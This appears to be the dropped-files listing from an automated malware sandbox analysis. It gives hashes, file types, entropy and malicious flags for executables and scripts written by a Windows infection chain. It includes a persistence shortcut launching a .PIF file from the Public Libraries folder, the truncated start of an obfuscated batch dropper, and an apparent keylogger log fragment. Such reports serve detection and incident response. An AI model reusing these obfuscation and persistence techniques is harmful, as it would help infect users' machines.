                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:B5DCD4C34EB13B9D2C1D6C7AE971BA83
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:E62CF8627F393D396C3FE7FEC77953DD8FE51C49
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:89D1889D3D0A09731002BC34D4B05BF017B84E87B4996779938B61E2FCD69C9F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:93C05355B2BF5AB421EFF63078CAEF8446831BBB9F1BDD2EE94C778CBCC60BB339372644616CE932406AC20557122CE620B3361A7B62E4CE7B3A81742E13ABD3
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Jwsmvmdw.PIF"..IconIndex=942729..HotKey=56..
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1636152
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.185832775275259
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:TLWgMFTOfQ4EGMp0nwrLWwv8Lgv5Q2GAXmpuX/LLlmynFNnSyRKHxNnrpEGOFz9H:HJMFTyVMp0wrLO45ZXmAViySIFBe+Z
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:3A5144C37240C98813B33D0350D0FF66
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:013D7DFCCAA9351301BA00A4C1426FD7217B5FCE
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:DD4C1B61E889891C10AA15DBFB1279FFBD0E6423E427CDD0F55DD6E5D1937ED5
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:E128EFE59A92C267143554EE47331E017988997635A1ECF6E806F91A52C869C0730C4285D3227DAD66E25BB189C8244D2F789E7E8A66720EE56548EE0644735C
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1051648
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.894752592142907
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:24576:ZVb5KPAdOzVmG3zd+EIDT8Jf3pbV13Jks:ZVhOhd+EI8t5X
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:943266BC468E334D168F1F43831E8B7D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:F6D83CAF22A573E96F82D589F9C7C33D15D8D73B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:ED7C088C9E9F1F53F2627D68DEC62F0712062B382F307E032140D3715F2BB7C6
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C119D99F0ECE4DF512623B2BE48A2DA4FF748382F3A12697A17D079DC7A90CC5589090F850DA042A87E8A5444DDD56C59293F5FD7A21B1AF629468569BB9B54A
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):2.0
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:3:pvn:Bn
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:778300BD8587672716B777C1C3F07C14
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EF2781BBE133C16ADB6600F5D01C3683F584384E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:CC40D093B4B0AA5F9CE40061B3489183AAB268DA0BE0400DEE53E5A6480D9346
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:265A83B0F14B57BA28203DDF96115EE404C34AC3DAF8CBA31E38B63DAEB31A84454B21B215AD603CA0EF424FAA11E1D003BC3F1510639A73A01929121513C2F0
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:29..
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):62357
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):4.705712327109906
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\x.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):68096
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.328046551801531
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):236544
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.4416694948877025
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):18944
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.742964649637377
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):418
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.356499146491567
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12:Q3La/hhkvoDLI4MWuCqDLI4MWuPTAt92n4M6:MLUE4K5E4Ke84j
MD5:A76B6F2687EBB8D1431673D0F7DE1F23
SHA1:99543B236437FC7CE320E06063ADF88EDE56D48F
SHA-256:A7B92434B657CB09F8CCC96911EA43F06DF4FE8873F3CE9CCA567753C96146FE
SHA-512:D61C66EC36431337897D8CB14676E574237AC3F0FC7621D09D2B1179455C6DEF5396D7130011F0D1B7961688D72350F769BD67088847AEB980FAB7A20F0E4613
Malicious:false
Reputation:unknown
Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):28
Entropy (8bit):3.601125010956985
Encrypted:false
SSDEEP:3:rRSFYJKXzovNsr4:EFYJKDoWr4
MD5:3EDC20402046A115DECDC253114161CC
SHA1:491936516B72BEC68CA4C36EBFE993BA4A3C2C0F
SHA-256:0429AAD3007C2D9B26ED655F02E94545BA94BD4CAA95E510C3AD163747CA725B
SHA-512:076D8F83EBABFC31565AE1D0420F1703246619BCA6DD831E4AA0E6F7D6F5659AEF37BBC519B2F439683C16F55FA272CCBA04F5C534FDD530B7360150584D5BFB
Malicious:false
Reputation:unknown
Preview:....### explorer ###..[WIN]
Process:C:\Windows\System32\extrac32.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):1051648
Entropy (8bit):6.894752592142907
Encrypted:false
SSDEEP:24576:ZVb5KPAdOzVmG3zd+EIDT8Jf3pbV13Jks:ZVhOhd+EI8t5X
MD5:943266BC468E334D168F1F43831E8B7D
SHA1:F6D83CAF22A573E96F82D589F9C7C33D15D8D73B
SHA-256:ED7C088C9E9F1F53F2627D68DEC62F0712062B382F307E032140D3715F2BB7C6
SHA-512:C119D99F0ECE4DF512623B2BE48A2DA4FF748382F3A12697A17D079DC7A90CC5589090F850DA042A87E8A5444DDD56C59293F5FD7A21B1AF629468569BB9B54A
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:OpenPGP Secret Key
Category:dropped
Size (bytes):12320
Entropy (8bit):7.985042476068835
Encrypted:false
SSDEEP:384:VdEWW/ocs+q+brNs0/BhdYyiJZDbWptEFJu7Gav:VqB/ocs+pbr605vYyiJZDbE7n
MD5:FE864DB49CB463E73032E0D242C5367E
SHA1:8BECD2AD983037D6031EC293C6404B1ACA504916
SHA-256:698D1C08B26765479C95747B8B73FEEAF5A324FB828525A47A7D6B651FF7BDFC
SHA-512:F058A1A0ED9EA97AF3ADC9C8B1F44C02A16AD430B6DEB2665799A7EFE6457255DE6777008DA44F1769030FA17729D9E4D704AC5421CD12D147327FE2227819FB
Malicious:false
Reputation:unknown
Process:C:\Windows\System32\msdtc.exe
File Type:ASCII text, with CRLF line terminators
Category:modified
Size (bytes):2313
Entropy (8bit):5.13084650290537
Encrypted:false
SSDEEP:48:32qhuhCehuhqfhuhofhuhE2qhuh6987FMx7F/rt57wt+07FKC7867qrT7FoC786V:Z070s0Y0q0mF7Dm5+
MD5:ECA8255C43049EEA486EE2466381D9AF
SHA1:9BEB0EDD3AD8EFD4B8A16FA07BD5B15BBBC76A4E
SHA-256:7D4AEA768F96F47B562513CF885AD93F6A3C269B180268D474652E35A876588B
SHA-512:9958E769B057A726994A39B3B970DAFAF60284A515DB8A6DED706A25CCA6403899285D7967D43EE2B6B7B537643A6FDCDD5BB61B8E847D0DDAD923B6499565B6
Malicious:false
Reputation:unknown
Preview:12-07-2019 09:17 : DTC Install error = 0, Enter MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (367)..12-07-2019 09:17 : DTC Install error = 0, Action: None, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (396)..12-07-2019 09:17 : DTC Install error = 0, Entering CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1700)..12-07-2019 09:17 : DTC Install error = 0, Exiting CreateXATmSecurityKeyCNG, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (1876)..12-07-2019 09:17 : DTC Install error = 0, Exit MsDtcAdvancedInstaller::Configure, base\wcp\plugins\msdtc\msdtcadvancedinstaller\msdtcadvancedinstaller.cpp (454)..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcSpecialize : Enter, com\complus\dtc\dtc\adme\deployment.cpp (2099) ..10-03-2023 08:56 : DTC Install error = 0, SysPrepDtcGeneralize : Enter, com\complus\dtc\dtc\adme\deploy
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1150976
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.038934630004959
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1801216
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):6.9743696432741835
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1348608
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.253806475258096
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1224192
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.163580505896271
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1242624
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):7.288989291598514
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1141248
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.01752530478114
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:oTXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:oTsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:525F4AE8B0B51CA29D93DB1875D48945
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:1CB29CFCB6808C480945BCCDEDF98339D3BC8E60
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:8D843CE5DD57760B2C0740CB5031902E5436CC53208C2C33F3F450084FD2DA07
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:ABD6B90EC189B53FCD9C82C1CD7D4CA57EE28FA4E311261403489921A40BE84EA1366EDF35978B17405F9820FBCC8A231FB225B4A5F5A87E82A3D80523DDF07F
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\msdtc.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):16384
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):0.3215220941777389
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:6:5FwATXl8ta/k/uMclF6vMclFq5zqzcksz8gYbOCzE5Zm3n+SkSJkJIOcuCjHu9+O:oKl80kqF69Fq5zuco6CzE5Z2+fqjFDKn
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:1D75098A1B940C83D94D8D13154BB680
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:64152F51D04D5D8E6D0CC28D244CAEE5E4767654
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:70120549EA4326B236255DB8A249DF109F7B9D26D2AC5089EEB1D18351699DB3
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2B5C91CEE743D3F971276EFD5F75A3EDF27DD7C2B09E4FE37798CDBBEBD3367D24C232281A7DA211F84906DD3C44F3D26ED633D34ED7DF58AE4805CB28FEA79B
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1511424
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.222940865570856
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:bObHA4LWOsvAYFTIXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9L:kjL3UTIsqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:350A23C304FAFA5EFD584F017610525E
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:EEF3DED50975A273D1FBCB84DDDF0F7451D8D935
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:90291A57299D12B2348E450EB505042770383125423668DB42B7E3E3B2CD4A71
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:2F6C19661C6107D18CB6067E7BA989D13598CFFB66C259799426EEA9F6BE34E6CDF8356E56D4D4CAC2CE9CBDB29E92B9E870809D2051C7CE4FD354632580E952
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                                                                                                                                                        Process:C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                        Size (bytes):1235968
                                                                                                                                                                                                                                                                                                                                                                                                                        Entropy (8bit):5.182227606387444
                                                                                                                                                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                        SSDEEP:12288:GpFtQOkXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:VOksqjnhMgeiCl7G0nehbGZpbD
                                                                                                                                                                                                                                                                                                                                                                                                                        MD5:083A7B3F7A1D4646EF789825E52C02AC
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA1:3A81F7A8EA164FE214AABC17BE2B1EF58C020753
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-256:DEDFE60EC7534367AD9A579A9B71075A8AC3CECA5DB7F8EA30017BE65738CC7D
                                                                                                                                                                                                                                                                                                                                                                                                                        SHA-512:058938FFDFA243C8DC7E96B0883397AA8885D7D31EABA23E3BB05FAE722A30DC1298659BE74F04EA01344BACDA4927C841B3328CE46514CADAD00E11F7408FD5
                                                                                                                                                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                                                                                                                                                        Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1513984
Entropy (8bit):7.102433382465078
Encrypted:false
SSDEEP:24576:13frCoQItLsiLPLe24CxruW4bIhllIsqjnhMgeiCl7G0nehbGZpbD:13fzsIPLkCNuVbIhD0Dmg27RnWGj
MD5:01670AF0E2D2C49A5B76BBA6148B4CF8
SHA1:0F4ED7B754F644DCEB4CEF66270E48DCF9DEDBC9
SHA-256:B6D7128C84CC47843CAE80F07D2F847ED294B3020F7BB15F56B1B18322209A68
SHA-512:BB8BC1D3D66AA363647F78BA4E5326617A0D00F0BCDED01EC722B4DEA5E0EBD97E3173C3BD85EB68397D79D115E29C79139449979EAEA188EB99BD98756740C7
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1846784
Entropy (8bit):6.939488439759572
Encrypted:false
SSDEEP:24576:YW6BApg2YuyuNDYTabvcRvNYf8km19sqjnhMgeiCl7G0nehbGZpbD:YF2YuHNETovcvNYf8kmLDmg27RnWGj
MD5:78D3D3C671FAB25B9BF6149AD1D00F30
SHA1:BC648FBB182FAEA57D1A0B82EEC5C57E4E9D03E1
SHA-256:620A1C22906331C6059A156CA5EC4DEF73F492A8433C92EDA83FDC15A9C8317E
SHA-512:3DB0D5276843DAF11B1869286B22E2DA5340531D2933685E4FBDBFF88C0F77842CF7BBC29595C46C5386BC8E7B3DCA9EC9202C0C7CD15357B049BA8CC41924D8
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (console) x86-64, for MS Windows
Category:dropped
Size (bytes):1455616
Entropy (8bit):7.238940032129324
Encrypted:false
SSDEEP:24576:RiW6ZvAKF5i/dN9Bdexj9Trk+FksqjnhMgeiCl7G0nehbGZpbD:RYxF50b9Bdm9TxSDmg27RnWGj
MD5:5B5A04180D3C1BE14C02BA823EFE4460
SHA1:43A4D396AFCC4AEEF091F8E7CA8745D57984ECD9
SHA-256:845588AEFFF13AB2C2406B7C1BF0F6038C13525D8213928BC730A92B15EFDBF7
SHA-512:2B426D4B1B3C2FD2A85AF9C1CB921E2EBBD0A1EE0A52A743CB9456C5CCD45CD6B42C23CD6463A3B60EE070F72EA638F50146FA14D357B8CB6C8A722894100F86
Malicious:true
Reputation:unknown
Process:C:\Users\Public\Libraries\wdmvmswJ.pif
File Type:PE32+ executable (GUI) x86-64, for MS Windows
Category:dropped
Size (bytes):1455616
Entropy (8bit):5.476616555522383
Encrypted:false
SSDEEP:24576:bJnJ5D3WYZsqjnhMgeiCl7G0nehbGZpbD:bJnJ5DGYdDmg27RnWGj
MD5:27CBA905A592DFF909E560BF017D5B53
SHA1:CB77C3C826E4FFB8A6B4590CB03416C5BB25F11B
SHA-256:FA630D311024D7FF2DFBCB166FD17F4447F7DFAAF7FE1D0FACA14AAA48641528
SHA-512:987F0D9F79343FA2F90C676EB7D5C6CF0F0D2EA1D144B1F5201B8344956DC445794C075FB4A95127FE2DF5F8BD76BC36430ADD8E01E8CCE39B3C92AEFB7E95C7
Malicious:true
Reputation:unknown
